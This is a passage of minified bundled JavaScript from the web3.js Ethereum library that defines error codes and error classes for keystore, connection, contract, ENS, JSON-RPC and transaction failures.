t.ERR_INVALID_LARGE_VALUE = 1011, t.ERR_INVALID_BLOCK = 1012, t.ERR_INVALID_TYPE_ABI = 1013, t.ERR_INVALID_NIBBLE_WIDTH = 1014, t.ERR_VALIDATION = 1100, t.ERR_CORE_HARDFORK_MISMATCH = 1101, t.ERR_CORE_CHAIN_MISMATCH = 1102, t.ERR_RPC_INVALID_JSON = -32700, t.ERR_RPC_INVALID_REQUEST = -32600, t.ERR_RPC_INVALID_METHOD = -32601, t.ERR_RPC_INVALID_PARAMS = -32602, t.ERR_RPC_INTERNAL_ERROR = -32603, t.ERR_RPC_INVALID_INPUT = -32000, t.ERR_RPC_MISSING_RESOURCE = -32001, t.ERR_RPC_UNAVAILABLE_RESOURCE = -32002, t.ERR_RPC_TRANSACTION_REJECTED = -32003, t.ERR_RPC_UNSUPPORTED_METHOD = -32004, t.ERR_RPC_LIMIT_EXCEEDED = -32005, t.ERR_RPC_NOT_SUPPORTED = -32006;
            },
            8105: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.PBKDF2IterationsError = t.IVLengthError = t.InvalidPasswordError = t.KeyStoreVersionError = t.KeyDerivationError = t.InvalidKdfError = t.InvalidSignatureError = t.InvalidPrivateKeyError = t.PrivateKeyLengthError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(){
                        super("Private key must be 32 bytes."), this.code = n.ERR_PRIVATE_KEY_LENGTH;
                    }
                }
                t.PrivateKeyLengthError = o;
                class s extends i.BaseWeb3Error {
                    constructor(){
                        super("Invalid Private Key, Not a valid string or uint8Array"), this.code = n.ERR_INVALID_PRIVATE_KEY;
                    }
                }
                t.InvalidPrivateKeyError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e){
                        super(`"${e}"`), this.code = n.ERR_INVALID_SIGNATURE;
                    }
                }
                t.InvalidSignatureError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("Invalid key derivation function"), this.code = n.ERR_UNSUPPORTED_KDF;
                    }
                }
                t.InvalidKdfError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super("Key derivation failed - possibly wrong password"), this.code = n.ERR_KEY_DERIVATION_FAIL;
                    }
                }
                t.KeyDerivationError = c;
                class l extends i.BaseWeb3Error {
                    constructor(){
                        super("Unsupported key store version"), this.code = n.ERR_KEY_VERSION_UNSUPPORTED;
                    }
                }
                t.KeyStoreVersionError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super("Password cannot be empty"), this.code = n.ERR_INVALID_PASSWORD;
                    }
                }
                t.InvalidPasswordError = d;
                class h extends i.BaseWeb3Error {
                    constructor(){
                        super("Initialization vector must be 16 bytes"), this.code = n.ERR_IV_LENGTH;
                    }
                }
                t.IVLengthError = h;
                class f extends i.BaseWeb3Error {
                    constructor(){
                        super("c > 1000, pbkdf2 is less secure with less iterations"), this.code = n.ERR_PBKDF2_ITERATIONS;
                    }
                }
                t.PBKDF2IterationsError = f;
            },
            3789: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.RequestAlreadySentError = t.PendingRequestsOnReconnectingError = t.MaxAttemptsReachedOnReconnectingError = t.ConnectionCloseError = t.ConnectionNotOpenError = t.ConnectionTimeoutError = t.InvalidConnectionError = t.ConnectionError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.code = n.ERR_CONN, t && (this.errorCode = t.code, this.errorReason = t.reason);
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            errorCode: this.errorCode,
                            errorReason: this.errorReason
                        });
                    }
                }
                t.ConnectionError = o, t.InvalidConnectionError = class extends o {
                    constructor(e, t){
                        super(`CONNECTION ERROR: Couldn't connect to node ${e}.`, t), this.host = e, this.code = n.ERR_CONN_INVALID;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            host: this.host
                        });
                    }
                }, t.ConnectionTimeoutError = class extends o {
                    constructor(e){
                        super(`CONNECTION TIMEOUT: timeout of ${e}ms achieved`), this.duration = e, this.code = n.ERR_CONN_TIMEOUT;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            duration: this.duration
                        });
                    }
                }, t.ConnectionNotOpenError = class extends o {
                    constructor(e){
                        super("Connection not open", e), this.code = n.ERR_CONN_NOT_OPEN;
                    }
                }, t.ConnectionCloseError = class extends o {
                    constructor(e){
                        var t, r;
                        super(`CONNECTION ERROR: The connection got closed with the close code ${null !== (t = null == e ? void 0 : e.code) && void 0 !== t ? t : ""} and the following reason string ${null !== (r = null == e ? void 0 : e.reason) && void 0 !== r ? r : ""}`, e), this.code = n.ERR_CONN_CLOSE;
                    }
                }, t.MaxAttemptsReachedOnReconnectingError = class extends o {
                    constructor(e){
                        super(`Maximum number of reconnect attempts reached! (${e})`), this.code = n.ERR_CONN_MAX_ATTEMPTS;
                    }
                }, t.PendingRequestsOnReconnectingError = class extends o {
                    constructor(){
                        super("CONNECTION ERROR: Provider started to reconnect before the response got received!"), this.code = n.ERR_CONN_PENDING_REQUESTS;
                    }
                }, t.RequestAlreadySentError = class extends o {
                    constructor(e){
                        super(`Request already sent with following id: ${e}`), this.code = n.ERR_REQ_ALREADY_SENT;
                    }
                };
            },
            510: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ContractTransactionDataAndInputError = t.ContractExecutionError = t.Eip838ExecutionError = t.ContractInstantiationError = t.ContractNoFromAddressDefinedError = t.ContractNoAddressDefinedError = t.ContractMissingDeployDataError = t.ContractReservedEventError = t.ContractEventDoesNotExistError = t.ContractOnceRequiresCallbackError = t.ContractMissingABIError = t.ResolverMethodMissingError = t.Web3ContractError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.code = n.ERR_CONTRACT, this.receipt = t;
                    }
                }
                t.Web3ContractError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(`The resolver at ${e} does not implement requested method: "${t}".`), this.address = e, this.name = t, this.code = n.ERR_CONTRACT_RESOLVER_MISSING;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            address: this.address,
                            name: this.name
                        });
                    }
                }
                t.ResolverMethodMissingError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super("You must provide the json interface of the contract when instantiating a contract object."), this.code = n.ERR_CONTRACT_ABI_MISSING;
                    }
                }
                t.ContractMissingABIError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("Once requires a callback as the second parameter."), this.code = n.ERR_CONTRACT_REQUIRED_CALLBACK;
                    }
                }
                t.ContractOnceRequiresCallbackError = u;
                class c extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Event "${e}" doesn't exist in this contract.`), this.eventName = e, this.code = n.ERR_CONTRACT_EVENT_NOT_EXISTS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            eventName: this.eventName
                        });
                    }
                }
                t.ContractEventDoesNotExistError = c;
                class l extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Event "${e}" doesn't exist in this contract.`), this.type = e, this.code = n.ERR_CONTRACT_RESERVED_EVENT;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            type: this.type
                        });
                    }
                }
                t.ContractReservedEventError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super('No "data" specified in neither the given options, nor the default options.'), this.code = n.ERR_CONTRACT_MISSING_DEPLOY_DATA;
                    }
                }
                t.ContractMissingDeployDataError = d;
                class h extends i.BaseWeb3Error {
                    constructor(){
                        super("This contract object doesn't have address set yet, please set an address first."), this.code = n.ERR_CONTRACT_MISSING_ADDRESS;
                    }
                }
                t.ContractNoAddressDefinedError = h;
                class f extends i.BaseWeb3Error {
                    constructor(){
                        super('No "from" address specified in neither the given options, nor the default options.'), this.code = n.ERR_CONTRACT_MISSING_FROM_ADDRESS;
                    }
                }
                t.ContractNoFromAddressDefinedError = f;
                class p extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_CONTRACT_INSTANTIATION;
                    }
                }
                t.ContractInstantiationError = p;
                class m extends o {
                    constructor(e){
                        if (super(e.message || "Error"), this.name = "name" in e && e.name || this.constructor.name, this.stack = "stack" in e && e.stack || void 0, this.code = e.code, "object" == typeof e.data) {
                            let t;
                            t = "originalError" in e.data ? e.data.originalError : e.data, this.data = t.data, this.innerError = new m(t);
                        } else this.data = e.data;
                    }
                    setDecodedProperties(e, t, r) {
                        this.errorName = e, this.errorSignature = t, this.errorArgs = r;
                    }
                    toJSON() {
                        let e = Object.assign(Object.assign({}, super.toJSON()), {
                            data: this.data
                        });
                        return this.errorName && (e = Object.assign(Object.assign({}, e), {
                            errorName: this.errorName,
                            errorSignature: this.errorSignature,
                            errorArgs: this.errorArgs
                        })), e;
                    }
                }
                t.Eip838ExecutionError = m, t.ContractExecutionError = class extends o {
                    constructor(e){
                        super("Error happened while trying to execute a function inside a smart contract"), this.code = n.ERR_CONTRACT_EXECUTION_REVERTED, this.innerError = new m(e);
                    }
                };
                class g extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`data: ${null !== (t = e.data) && void 0 !== t ? t : "undefined"}, input: ${null !== (r = e.input) && void 0 !== r ? r : "undefined"}`, 'You can\'t have "data" and "input" as properties of a contract at the same time, please use either "data" or "input" instead.'), this.code = n.ERR_CONTRACT_TX_DATA_AND_INPUT;
                    }
                }
                t.ContractTransactionDataAndInputError = g;
            },
            3628: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ConfigChainMismatchError = t.ConfigHardforkMismatchError = void 0;
                const n = r(3685), i = r(7639);
                class o extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(`Web3Config hardfork doesnt match in defaultHardfork ${e} and common.hardfork ${t}`), this.code = i.ERR_CORE_HARDFORK_MISMATCH;
                    }
                }
                t.ConfigHardforkMismatchError = o;
                class s extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(`Web3Config chain doesnt match in defaultHardfork ${e} and common.hardfork ${t}`), this.code = i.ERR_CORE_HARDFORK_MISMATCH;
                    }
                }
                t.ConfigChainMismatchError = s;
            },
            1591: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENSNetworkNotSyncedError = t.ENSUnsupportedNetworkError = t.ENSCheckInterfaceSupportError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e){
                        super(`ENS resolver check interface support error. "${e}"`), this.code = n.ERR_ENS_CHECK_INTERFACE_SUPPORT;
                    }
                }
                t.ENSCheckInterfaceSupportError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`ENS is not supported on network ${e}`), this.code = n.ERR_ENS_UNSUPPORTED_NETWORK;
                    }
                }
                t.ENSUnsupportedNetworkError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super("Network not synced"), this.code = n.ERR_ENS_NETWORK_NOT_SYNCED;
                    }
                }
                t.ENSNetworkNotSyncedError = a;
            },
            7297: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ExistingPluginNamespaceError = t.AbiError = t.OperationAbortError = t.OperationTimeoutError = t.MethodNotImplementedError = t.FormatterError = t.InvalidMethodParamsError = t.InvalidNumberOfParamsError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t, r){
                        super(`Invalid number of parameters for "${r}". Got "${e}" expected "${t}"!`), this.got = e, this.expected = t, this.method = r, this.code = n.ERR_PARAM;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            got: this.got,
                            expected: this.expected,
                            method: this.method
                        });
                    }
                }
                t.InvalidNumberOfParamsError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Invalid parameters passed. "${void 0 !== e ? e : ""}"`), this.hint = e, this.code = n.ERR_INVALID_METHOD_PARAMS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            hint: this.hint
                        });
                    }
                }
                t.InvalidMethodParamsError = s;
                class a extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_FORMATTERS;
                    }
                }
                t.FormatterError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super("The method you're trying to call is not implemented."), this.code = n.ERR_METHOD_NOT_IMPLEMENTED;
                    }
                }
                t.MethodNotImplementedError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_OPERATION_TIMEOUT;
                    }
                }
                t.OperationTimeoutError = c;
                class l extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_OPERATION_ABORT;
                    }
                }
                t.OperationAbortError = l;
                class d extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_ABI_ENCODING;
                    }
                }
                t.AbiError = d;
                class h extends i.BaseWeb3Error {
                    constructor(e){
                        super(`A plugin with the namespace: ${e} has already been registered.`), this.code = n.ERR_EXISTING_PLUGIN_NAMESPACE;
                    }
                }
                t.ExistingPluginNamespaceError = h;
            },
            7108: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3WSProviderError = t.SubscriptionError = t.InvalidClientError = t.InvalidProviderError = t.ProviderError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_PROVIDER;
                    }
                }
                t.ProviderError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Provider with url "${e}" is not set or invalid`), this.clientUrl = e, this.code = n.ERR_INVALID_PROVIDER;
                    }
                }
                t.InvalidProviderError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Client URL "${e}" is invalid.`), this.code = n.ERR_INVALID_CLIENT;
                    }
                }
                t.InvalidClientError = a;
                class u extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_SUBSCRIPTION;
                    }
                }
                t.SubscriptionError = u;
                class c extends i.BaseWeb3Error {
                    constructor(){
                        super(...arguments), this.code = n.ERR_WS_PROVIDER;
                    }
                }
                t.Web3WSProviderError = c;
            },
            9491: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidResponseError = t.ResponseError = void 0;
                const n = r(3685), i = r(7639), o = (e)=>((e)=>!(Array.isArray(e) || "2.0" !== e.jsonrpc || !e || void 0 !== e.result && null !== e.result || !("error" in e) || "number" != typeof e.id && "string" != typeof e.id))(e) ? e.error.message : "";
                class s extends n.BaseWeb3Error {
                    constructor(e, t, r){
                        var n;
                        super(null != t ? t : `Returned error: ${Array.isArray(e) ? e.map((e)=>o(e)).join(",") : o(e)}`), this.code = i.ERR_RESPONSE, t || (this.data = Array.isArray(e) ? e.map((e)=>{
                            var t;
                            return null === (t = e.error) || void 0 === t ? void 0 : t.data;
                        }) : null === (n = null == e ? void 0 : e.error) || void 0 === n ? void 0 : n.data), this.request = r;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            data: this.data,
                            request: this.request
                        });
                    }
                }
                t.ResponseError = s, t.InvalidResponseError = class extends s {
                    constructor(e, t){
                        let r;
                        super(e, void 0, t), this.code = i.ERR_INVALID_RESPONSE, "error" in e ? r = e.error : e instanceof Array && (r = e.map((e)=>e.error)), this.innerError = r;
                    }
                };
            },
            655: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rpcErrorsMap = t.LimitExceededError = t.TransactionRejectedError = t.VersionNotSupportedError = t.ResourcesNotFoundError = t.ResourceUnavailableError = t.MethodNotSupported = t.InvalidInputError = t.InternalError = t.InvalidParamsError = t.MethodNotFoundError = t.InvalidRequestError = t.ParseError = t.RpcError = void 0;
                const n = r(3685), i = r(7639);
                class o extends n.BaseWeb3Error {
                    constructor(e, t){
                        super(null != t ? t : `An Rpc error has occured with a code of ${e.error.code}`), this.code = e.error.code, this.id = e.id, this.jsonrpc = e.jsonrpc, this.jsonRpcError = e.error;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            error: this.jsonRpcError,
                            id: this.id,
                            jsonRpc: this.jsonrpc
                        });
                    }
                }
                t.RpcError = o;
                class s extends o {
                    constructor(e){
                        super(e, "Parse error"), this.code = i.ERR_RPC_INVALID_JSON;
                    }
                }
                t.ParseError = s;
                class a extends o {
                    constructor(e){
                        super(e, "Invalid request"), this.code = i.ERR_RPC_INVALID_REQUEST;
                    }
                }
                t.InvalidRequestError = a;
                class u extends o {
                    constructor(e){
                        super(e, "Method not found"), this.code = i.ERR_RPC_INVALID_METHOD;
                    }
                }
                t.MethodNotFoundError = u;
                class c extends o {
                    constructor(e){
                        super(e, "Invalid request"), this.code = i.ERR_RPC_INVALID_PARAMS;
                    }
                }
                t.InvalidParamsError = c;
                class l extends o {
                    constructor(e){
                        super(e, "Internal error"), this.code = i.ERR_RPC_INTERNAL_ERROR;
                    }
                }
                t.InternalError = l;
                class d extends o {
                    constructor(e){
                        super(e, "Invalid input"), this.code = i.ERR_RPC_INVALID_INPUT;
                    }
                }
                t.InvalidInputError = d;
                class h extends o {
                    constructor(e){
                        super(e, "Method not supported"), this.code = i.ERR_RPC_UNSUPPORTED_METHOD;
                    }
                }
                t.MethodNotSupported = h;
                class f extends o {
                    constructor(e){
                        super(e, "Resource unavailable"), this.code = i.ERR_RPC_UNAVAILABLE_RESOURCE;
                    }
                }
                t.ResourceUnavailableError = f;
                class p extends o {
                    constructor(e){
                        super(e, "Resource not found"), this.code = i.ERR_RPC_MISSING_RESOURCE;
                    }
                }
                t.ResourcesNotFoundError = p;
                class m extends o {
                    constructor(e){
                        super(e, "JSON-RPC version not supported"), this.code = i.ERR_RPC_NOT_SUPPORTED;
                    }
                }
                t.VersionNotSupportedError = m;
                class g extends o {
                    constructor(e){
                        super(e, "Transaction rejected"), this.code = i.ERR_RPC_TRANSACTION_REJECTED;
                    }
                }
                t.TransactionRejectedError = g;
                class y extends o {
                    constructor(e){
                        super(e, "Limit exceeded"), this.code = i.ERR_RPC_LIMIT_EXCEEDED;
                    }
                }
                t.LimitExceededError = y, t.rpcErrorsMap = new Map, t.rpcErrorsMap.set(i.ERR_RPC_INVALID_JSON, {
                    error: s
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_REQUEST, {
                    error: a
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_METHOD, {
                    error: u
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_PARAMS, {
                    error: c
                }), t.rpcErrorsMap.set(i.ERR_RPC_INTERNAL_ERROR, {
                    error: l
                }), t.rpcErrorsMap.set(i.ERR_RPC_INVALID_INPUT, {
                    error: d
                }), t.rpcErrorsMap.set(i.ERR_RPC_UNSUPPORTED_METHOD, {
                    error: h
                }), t.rpcErrorsMap.set(i.ERR_RPC_UNAVAILABLE_RESOURCE, {
                    error: f
                }), t.rpcErrorsMap.set(i.ERR_RPC_TRANSACTION_REJECTED, {
                    error: g
                }), t.rpcErrorsMap.set(i.ERR_RPC_MISSING_RESOURCE, {
                    error: p
                }), t.rpcErrorsMap.set(i.ERR_RPC_NOT_SUPPORTED, {
                    error: m
                }), t.rpcErrorsMap.set(i.ERR_RPC_LIMIT_EXCEEDED, {
                    error: y
                });
            },
            1075: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SignatureError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.InvalidValueError {
                    constructor(){
                        super(...arguments), this.code = n.ERR_SIGNATURE_FAILED;
                    }
                }
                t.SignatureError = o;
            },
            8450: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidPropertiesForTransactionTypeError = t.LocalWalletNotAvailableError = t.TransactionSigningError = t.TransactionReceiptMissingBlockNumberError = t.TransactionMissingReceiptOrBlockHashError = t.TransactionBlockTimeoutError = t.TransactionPollingTimeoutError = t.TransactionSendTimeoutError = t.TransactionDataAndInputError = t.UnsupportedTransactionTypeError = t.Eip1559NotSupportedError = t.UnableToPopulateNonceError = t.InvalidNonceOrChainIdError = t.InvalidTransactionObjectError = t.UnsupportedFeeMarketError = t.Eip1559GasPriceError = t.InvalidMaxPriorityFeePerGasOrMaxFeePerGas = t.InvalidGasOrGasPrice = t.TransactionGasMismatchError = t.MissingGasError = t.MissingChainOrHardforkError = t.CommonOrChainAndHardforkError = t.HardforkMismatchError = t.ChainMismatchError = t.ChainIdMismatchError = t.MissingCustomChainIdError = t.MissingCustomChainError = t.InvalidTransactionCall = t.InvalidTransactionWithReceiver = t.InvalidTransactionWithSender = t.TransactionNotFound = t.UndefinedRawTransactionError = t.TransactionOutOfGasError = t.TransactionRevertedWithoutReasonError = t.ContractCodeNotStoredError = t.NoContractAddressFoundError = t.TransactionRevertWithCustomError = t.TransactionRevertInstructionError = t.RevertInstructionError = t.TransactionError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(e), this.receipt = t, this.code = n.ERR_TX;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            receipt: this.receipt
                        });
                    }
                }
                t.TransactionError = o;
                class s extends i.BaseWeb3Error {
                    constructor(e, t){
                        super(`Your request got reverted with the following reason string: ${e}`), this.reason = e, this.signature = t, this.code = n.ERR_TX_REVERT_INSTRUCTION;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            signature: this.signature
                        });
                    }
                }
                t.RevertInstructionError = s;
                class a extends i.BaseWeb3Error {
                    constructor(e, t, r, o){
                        super("Transaction has been reverted by the EVM" + (void 0 === r ? "" : `:\n ${i.BaseWeb3Error.convertToString(r)}`)), this.reason = e, this.signature = t, this.receipt = r, this.data = o, this.code = n.ERR_TX_REVERT_TRANSACTION;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            signature: this.signature,
                            receipt: this.receipt,
                            data: this.data
                        });
                    }
                }
                t.TransactionRevertInstructionError = a, t.TransactionRevertWithCustomError = class extends a {
                    constructor(e, t, r, i, o, s, a){
                        super(e), this.reason = e, this.customErrorName = t, this.customErrorDecodedSignature = r, this.customErrorArguments = i, this.signature = o, this.receipt = s, this.data = a, this.code = n.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            reason: this.reason,
                            customErrorName: this.customErrorName,
                            customErrorDecodedSignature: this.customErrorDecodedSignature,
                            customErrorArguments: this.customErrorArguments,
                            signature: this.signature,
                            receipt: this.receipt,
                            data: this.data
                        });
                    }
                }, t.NoContractAddressFoundError = class extends o {
                    constructor(e){
                        super("The transaction receipt didn't contain a contract address.", e), this.code = n.ERR_TX_NO_CONTRACT_ADDRESS;
                    }
                    toJSON() {
                        return Object.assign(Object.assign({}, super.toJSON()), {
                            receipt: this.receipt
                        });
                    }
                }, t.ContractCodeNotStoredError = class extends o {
                    constructor(e){
                        super("The contract code couldn't be stored, please check your gas limit.", e), this.code = n.ERR_TX_CONTRACT_NOT_STORED;
                    }
                }, t.TransactionRevertedWithoutReasonError = class extends o {
                    constructor(e){
                        super("Transaction has been reverted by the EVM" + (void 0 === e ? "" : `:\n ${i.BaseWeb3Error.convertToString(e)}`), e), this.code = n.ERR_TX_REVERT_WITHOUT_REASON;
                    }
                }, t.TransactionOutOfGasError = class extends o {
                    constructor(e){
                        super(`Transaction ran out of gas. Please provide more gas:\n ${JSON.stringify(e, void 0, 2)}`, e), this.code = n.ERR_TX_OUT_OF_GAS;
                    }
                }, t.UndefinedRawTransactionError = class extends o {
                    constructor(){
                        super("Raw transaction undefined"), this.code = n.ERR_RAW_TX_UNDEFINED;
                    }
                }, t.TransactionNotFound = class extends o {
                    constructor(){
                        super("Transaction not found"), this.code = n.ERR_TX_NOT_FOUND;
                    }
                };
                class u extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction with invalid sender"), this.code = n.ERR_TX_INVALID_SENDER;
                    }
                }
                t.InvalidTransactionWithSender = u;
                class c extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction with invalid receiver"), this.code = n.ERR_TX_INVALID_RECEIVER;
                    }
                }
                t.InvalidTransactionWithReceiver = c;
                class l extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction call"), this.code = n.ERR_TX_INVALID_CALL;
                    }
                }
                t.InvalidTransactionCall = l;
                class d extends i.InvalidValueError {
                    constructor(){
                        super("MissingCustomChainError", "If tx.common is provided it must have tx.common.customChain"), this.code = n.ERR_TX_MISSING_CUSTOM_CHAIN;
                    }
                }
                t.MissingCustomChainError = d;
                class h extends i.InvalidValueError {
                    constructor(){
                        super("MissingCustomChainIdError", "If tx.common is provided it must have tx.common.customChain and tx.common.customChain.chainId"), this.code = n.ERR_TX_MISSING_CUSTOM_CHAIN_ID;
                    }
                }
                t.MissingCustomChainIdError = h;
                class f extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "Chain Id doesnt match in tx.chainId tx.common.customChain.chainId"), this.code = n.ERR_TX_CHAIN_ID_MISMATCH;
                    }
                }
                t.ChainIdMismatchError = f;
                class p extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "Chain doesnt match in tx.chain tx.common.basechain"), this.code = n.ERR_TX_CHAIN_MISMATCH;
                    }
                }
                t.ChainMismatchError = p;
                class m extends i.InvalidValueError {
                    constructor(e){
                        super(JSON.stringify(e), "hardfork doesnt match in tx.hardfork tx.common.hardfork"), this.code = n.ERR_TX_HARDFORK_MISMATCH;
                    }
                }
                t.HardforkMismatchError = m;
                class g extends i.InvalidValueError {
                    constructor(){
                        super("CommonOrChainAndHardforkError", "Please provide the common object or the chain and hardfork property but not all together."), this.code = n.ERR_TX_INVALID_CHAIN_INFO;
                    }
                }
                t.CommonOrChainAndHardforkError = g;
                class y extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super("MissingChainOrHardforkError", `When specifying chain and hardfork, both values must be defined. Received "chain": ${null !== (t = e.chain) && void 0 !== t ? t : "undefined"}, "hardfork": ${null !== (r = e.hardfork) && void 0 !== r ? r : "undefined"}`), this.code = n.ERR_TX_MISSING_CHAIN_INFO;
                    }
                }
                t.MissingChainOrHardforkError = y;
                class v extends i.InvalidValueError {
                    constructor(e){
                        var t, r, i, o;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}, maxPriorityFeePerGas: ${null !== (i = e.maxPriorityFeePerGas) && void 0 !== i ? i : "undefined"}, maxFeePerGas: ${null !== (o = e.maxFeePerGas) && void 0 !== o ? o : "undefined"}`, '"gas" is missing'), this.code = n.ERR_TX_MISSING_GAS;
                    }
                }
                t.MissingGasError = v;
                class b extends i.InvalidValueError {
                    constructor(e){
                        var t, r, i, o;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}, maxPriorityFeePerGas: ${null !== (i = e.maxPriorityFeePerGas) && void 0 !== i ? i : "undefined"}, maxFeePerGas: ${null !== (o = e.maxFeePerGas) && void 0 !== o ? o : "undefined"}`, "transaction must specify legacy or fee market gas properties, not both"), this.code = n.ERR_TX_GAS_MISMATCH;
                    }
                }
                t.TransactionGasMismatchError = b;
                class E extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`gas: ${null !== (t = e.gas) && void 0 !== t ? t : "undefined"}, gasPrice: ${null !== (r = e.gasPrice) && void 0 !== r ? r : "undefined"}`, "Gas or gasPrice is lower than 0"), this.code = n.ERR_TX_INVALID_LEGACY_GAS;
                    }
                }
                t.InvalidGasOrGasPrice = E;
                class A extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`maxPriorityFeePerGas: ${null !== (t = e.maxPriorityFeePerGas) && void 0 !== t ? t : "undefined"}, maxFeePerGas: ${null !== (r = e.maxFeePerGas) && void 0 !== r ? r : "undefined"}`, "maxPriorityFeePerGas or maxFeePerGas is lower than 0"), this.code = n.ERR_TX_INVALID_FEE_MARKET_GAS;
                    }
                }
                t.InvalidMaxPriorityFeePerGasOrMaxFeePerGas = A;
                class _ extends i.InvalidValueError {
                    constructor(e){
                        super(e, "eip-1559 transactions don't support gasPrice"), this.code = n.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE;
                    }
                }
                t.Eip1559GasPriceError = _;
                class w extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`maxPriorityFeePerGas: ${null !== (t = e.maxPriorityFeePerGas) && void 0 !== t ? t : "undefined"}, maxFeePerGas: ${null !== (r = e.maxFeePerGas) && void 0 !== r ? r : "undefined"}`, "pre-eip-1559 transaction don't support maxFeePerGas/maxPriorityFeePerGas"), this.code = n.ERR_TX_INVALID_LEGACY_FEE_MARKET;
                    }
                }
                t.UnsupportedFeeMarketError = w;
                class T extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid transaction object"), this.code = n.ERR_TX_INVALID_OBJECT;
                    }
                }
                t.InvalidTransactionObjectError = T;
                class R extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
